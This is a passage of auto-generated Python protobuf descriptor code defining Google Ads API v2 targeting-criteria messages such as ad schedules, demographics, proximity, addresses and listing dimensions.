name='end_minute', full_name='google.ads.googleads.v2.common.AdScheduleInfo.end_minute', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='start_hour', full_name='google.ads.googleads.v2.common.AdScheduleInfo.start_hour', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='end_hour', full_name='google.ads.googleads.v2.common.AdScheduleInfo.end_hour', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='day_of_week', full_name='google.ads.googleads.v2.common.AdScheduleInfo.day_of_week', index=4,
number=5, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5914,
serialized_end=6269,
)
_AGERANGEINFO = _descriptor.Descriptor(
name='AgeRangeInfo',
full_name='google.ads.googleads.v2.common.AgeRangeInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.AgeRangeInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6271,
serialized_end=6361,
)
_GENDERINFO = _descriptor.Descriptor(
name='GenderInfo',
full_name='google.ads.googleads.v2.common.GenderInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.GenderInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6363,
serialized_end=6447,
)
_INCOMERANGEINFO = _descriptor.Descriptor(
name='IncomeRangeInfo',
full_name='google.ads.googleads.v2.common.IncomeRangeInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.IncomeRangeInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6449,
serialized_end=6548,
)
_PARENTALSTATUSINFO = _descriptor.Descriptor(
name='ParentalStatusInfo',
full_name='google.ads.googleads.v2.common.ParentalStatusInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.ParentalStatusInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6550,
serialized_end=6658,
)
_YOUTUBEVIDEOINFO = _descriptor.Descriptor(
name='YouTubeVideoInfo',
full_name='google.ads.googleads.v2.common.YouTubeVideoInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='video_id', full_name='google.ads.googleads.v2.common.YouTubeVideoInfo.video_id', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6660,
serialized_end=6726,
)
_YOUTUBECHANNELINFO = _descriptor.Descriptor(
name='YouTubeChannelInfo',
full_name='google.ads.googleads.v2.common.YouTubeChannelInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='channel_id', full_name='google.ads.googleads.v2.common.YouTubeChannelInfo.channel_id', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6728,
serialized_end=6798,
)
_USERLISTINFO = _descriptor.Descriptor(
name='UserListInfo',
full_name='google.ads.googleads.v2.common.UserListInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='user_list', full_name='google.ads.googleads.v2.common.UserListInfo.user_list', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6800,
serialized_end=6863,
)
_PROXIMITYINFO = _descriptor.Descriptor(
name='ProximityInfo',
full_name='google.ads.googleads.v2.common.ProximityInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='geo_point', full_name='google.ads.googleads.v2.common.ProximityInfo.geo_point', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='radius', full_name='google.ads.googleads.v2.common.ProximityInfo.radius', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='radius_units', full_name='google.ads.googleads.v2.common.ProximityInfo.radius_units', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='address', full_name='google.ads.googleads.v2.common.ProximityInfo.address', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6866,
serialized_end=7154,
)
_GEOPOINTINFO = _descriptor.Descriptor(
name='GeoPointInfo',
full_name='google.ads.googleads.v2.common.GeoPointInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='longitude_in_micro_degrees', full_name='google.ads.googleads.v2.common.GeoPointInfo.longitude_in_micro_degrees', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='latitude_in_micro_degrees', full_name='google.ads.googleads.v2.common.GeoPointInfo.latitude_in_micro_degrees', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7157,
serialized_end=7300,
)
_ADDRESSINFO = _descriptor.Descriptor(
name='AddressInfo',
full_name='google.ads.googleads.v2.common.AddressInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='postal_code', full_name='google.ads.googleads.v2.common.AddressInfo.postal_code', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='province_code', full_name='google.ads.googleads.v2.common.AddressInfo.province_code', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='country_code', full_name='google.ads.googleads.v2.common.AddressInfo.country_code', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='province_name', full_name='google.ads.googleads.v2.common.AddressInfo.province_name', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='street_address', full_name='google.ads.googleads.v2.common.AddressInfo.street_address', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='street_address2', full_name='google.ads.googleads.v2.common.AddressInfo.street_address2', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='city_name', full_name='google.ads.googleads.v2.common.AddressInfo.city_name', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7303,
serialized_end=7683,
)
_TOPICINFO = _descriptor.Descriptor(
name='TopicInfo',
full_name='google.ads.googleads.v2.common.TopicInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='topic_constant', full_name='google.ads.googleads.v2.common.TopicInfo.topic_constant', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='path', full_name='google.ads.googleads.v2.common.TopicInfo.path', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7685,
serialized_end=7794,
)
_LANGUAGEINFO = _descriptor.Descriptor(
name='LanguageInfo',
full_name='google.ads.googleads.v2.common.LanguageInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='language_constant', full_name='google.ads.googleads.v2.common.LanguageInfo.language_constant', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7796,
serialized_end=7867,
)
_IPBLOCKINFO = _descriptor.Descriptor(
name='IpBlockInfo',
full_name='google.ads.googleads.v2.common.IpBlockInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='ip_address', full_name='google.ads.googleads.v2.common.IpBlockInfo.ip_address', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7869,
serialized_end=7932,
)
_CONTENTLABELINFO = _descriptor.Descriptor(
name='ContentLabelInfo',
full_name='google.ads.googleads.v2.common.ContentLabelInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.ContentLabelInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7934,
serialized_end=8036,
)
_CARRIERINFO = _descriptor.Descriptor(
name='CarrierInfo',
full_name='google.ads.googleads.v2.common.CarrierInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='carrier_constant', full_name='google.ads.googleads.v2.common.CarrierInfo.carrier_constant', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8038,
serialized_end=8107,
)
_USERINTERESTINFO = _descriptor.Descriptor(
name='UserInterestInfo',
full_name='google.ads.googleads.v2.common.UserInterestInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='user_interest_category', full_name='google.ads.googleads.v2.common.UserInterestInfo.user_interest_category', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8109,
serialized_end=8189,
)
_WEBPAGEINFO = _descriptor.Descriptor(
name='WebpageInfo',
full_name='google.ads.googleads.v2.common.WebpageInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='criterion_name', full_name='google.ads.googleads.v2.common.WebpageInfo.criterion_name', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='conditions', full_name='google.ads.googleads.v2.common.WebpageInfo.conditions', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8192,
serialized_end=8333,
)
_WEBPAGECONDITIONINFO = _descriptor.Descriptor(
name='WebpageConditionInfo',
full_name='google.ads.googleads.v2.common.WebpageConditionInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='operand', full_name='google.ads.googleads.v2.common.WebpageConditionInfo.operand', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='operator', full_name='google.ads.googleads.v2.common.WebpageConditionInfo.operator', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='argument', full_name='google.ads.googleads.v2.common.WebpageConditionInfo.argument', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8336,
serialized_end=8611,
)
_OPERATINGSYSTEMVERSIONINFO = _descriptor.Descriptor(
name='OperatingSystemVersionInfo',
full_name='google.ads.googleads.v2.common.OperatingSystemVersionInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='operating_system_version_constant', full_name='google.ads.googleads.v2.common.OperatingSystemVersionInfo.operating_system_version_constant', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8613,
serialized_end=8714,
)
_APPPAYMENTMODELINFO = _descriptor.Descriptor(
name='AppPaymentModelInfo',
full_name='google.ads.googleads.v2.common.AppPaymentModelInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.AppPaymentModelInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8716,
serialized_end=8827,
)
_MOBILEDEVICEINFO = _descriptor.Descriptor(
name='MobileDeviceInfo',
full_name='google.ads.googleads.v2.common.MobileDeviceInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='mobile_device_constant', full_name='google.ads.googleads.v2.common.MobileDeviceInfo.mobile_device_constant', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8829,
serialized_end=8909,
)
_CUSTOMAFFINITYINFO = _descriptor.Descriptor(
name='CustomAffinityInfo',
full_name='google.ads.googleads.v2.common.CustomAffinityInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='custom_affinity', full_name='google.ads.googleads.v2.common.CustomAffinityInfo.custom_affinity', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8911,
serialized_end=8986,
)
_CUSTOMINTENTINFO = _descriptor.Descriptor(
name='CustomIntentInfo',
full_name='google.ads.googleads.v2.common.CustomIntentInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='custom_intent', full_name='google.ads.googleads.v2.common.CustomIntentInfo.custom_intent', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8988,
serialized_end=9059,
)
_LOCATIONGROUPINFO = _descriptor.Descriptor(
name='LocationGroupInfo',
full_name='google.ads.googleads.v2.common.LocationGroupInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='feed', full_name='google.ads.googleads.v2.common.LocationGroupInfo.feed', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='geo_target_constants', full_name='google.ads.googleads.v2.common.LocationGroupInfo.geo_target_constants', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='radius', full_name='google.ads.googleads.v2.common.LocationGroupInfo.radius', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='radius_units', full_name='google.ads.googleads.v2.common.LocationGroupInfo.radius_units', index=3,
number=4, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=9062,
serialized_end=9338,
)
_KEYWORDINFO.fields_by_name['text'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_KEYWORDINFO.fields_by_name['match_type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_keyword__match__type__pb2._KEYWORDMATCHTYPEENUM_KEYWORDMATCHTYPE
_PLACEMENTINFO.fields_by_name['url'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_MOBILEAPPCATEGORYINFO.fields_by_name['mobile_app_category_constant'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_MOBILEAPPLICATIONINFO.fields_by_name['app_id'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_MOBILEAPPLICATIONINFO.fields_by_name['name'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_LOCATIONINFO.fields_by_name['geo_target_constant'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_DEVICEINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_device__pb2._DEVICEENUM_DEVICE
_PREFERREDCONTENTINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_preferred__content__type__pb2._PREFERREDCONTENTTYPEENUM_PREFERREDCONTENTTYPE
_LISTINGGROUPINFO.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_listing__group__type__pb2._LISTINGGROUPTYPEENUM_LISTINGGROUPTYPE
_LISTINGGROUPINFO.fields_by_name['case_value'].message_type = _LISTINGDIMENSIONINFO
_LISTINGGROUPINFO.fields_by_name['parent_ad_group_criterion'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_LISTINGSCOPEINFO.fields_by_name['dimensions'].message_type = _LISTINGDIMENSIONINFO
_LISTINGDIMENSIONINFO.fields_by_name['listing_brand'].message_type = _LISTINGBRANDINFO
_LISTINGDIMENSIONINFO.fields_by_name['hotel_id'].message_type = _HOTELIDINFO
_LISTINGDIMENSIONINFO.fields_by_name['hotel_class'].message_type = _HOTELCLASSINFO
_LISTINGDIMENSIONINFO.fields_by_name['hotel_country_region'].message_type = _HOTELCOUNTRYREGIONINFO
_LISTINGDIMENSIONINFO.fields_by_name['hotel_state'].message_type = _HOTELSTATEINFO
_LISTINGDIMENSIONINFO.fields_by_name['hotel_city'].message_type = _HOTELCITYINFO
_LISTINGDIMENSIONINFO.fields_by_name['listing_custom_attribute'].message_type = _LISTINGCUSTOMATTRIBUTEINFO
_LISTINGDIMENSIONINFO.fields_by_name['product_bidding_category'].message_type = _PRODUCTBIDDINGCATEGORYINFO
_LISTINGDIMENSIONINFO.fields_by_name['product_channel'].message_type = _PRODUCTCHANNELINFO
_LISTINGDIMENSIONINFO.fields_by_name['product_channel_exclusivity'].message_type = _PRODUCTCHANNELEXCLUSIVITYINFO
_LISTINGDIMENSIONINFO.fields_by_name['product_condition'].message_type = _PRODUCTCONDITIONINFO
_LISTINGDIMENSIONINFO.fields_by_name['product_item_id'].message_type = _PRODUCTITEMIDINFO
_LISTINGDIMENSIONINFO.fields_by_name['product_type'].message_type = _PRODUCTTYPEINFO
_LISTINGDIMENSIONINFO.fields_by_name['unknown_listing_dimension'].message_type = _UNKNOWNLISTINGDIMENSIONINFO
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['listing_brand'])
_LISTINGDIMENSIONINFO.fields_by_name['listing_brand'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['hotel_id'])
_LISTINGDIMENSIONINFO.fields_by_name['hotel_id'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['hotel_class'])
_LISTINGDIMENSIONINFO.fields_by_name['hotel_class'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['hotel_country_region'])
_LISTINGDIMENSIONINFO.fields_by_name['hotel_country_region'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['hotel_state'])
_LISTINGDIMENSIONINFO.fields_by_name['hotel_state'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['hotel_city'])
_LISTINGDIMENSIONINFO.fields_by_name['hotel_city'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['listing_custom_attribute'])
_LISTINGDIMENSIONINFO.fields_by_name['listing_custom_attribute'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['product_bidding_category'])
_LISTINGDIMENSIONINFO.fields_by_name['product_bidding_category'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['product_channel'])
_LISTINGDIMENSIONINFO.fields_by_name['product_channel'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['product_channel_exclusivity'])
_LISTINGDIMENSIONINFO.fields_by_name['product_channel_exclusivity'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['product_condition'])
_LISTINGDIMENSIONINFO.fields_by_name['product_condition'].containing_oneof = _LISTINGDIMENSIONINFO.oneofs_by_name['dimension']
_LISTINGDIMENSIONINFO.oneofs_by_name['dimension'].fields.append(
_LISTINGDIMENSIONINFO.fields_by_name['product_item_id'])
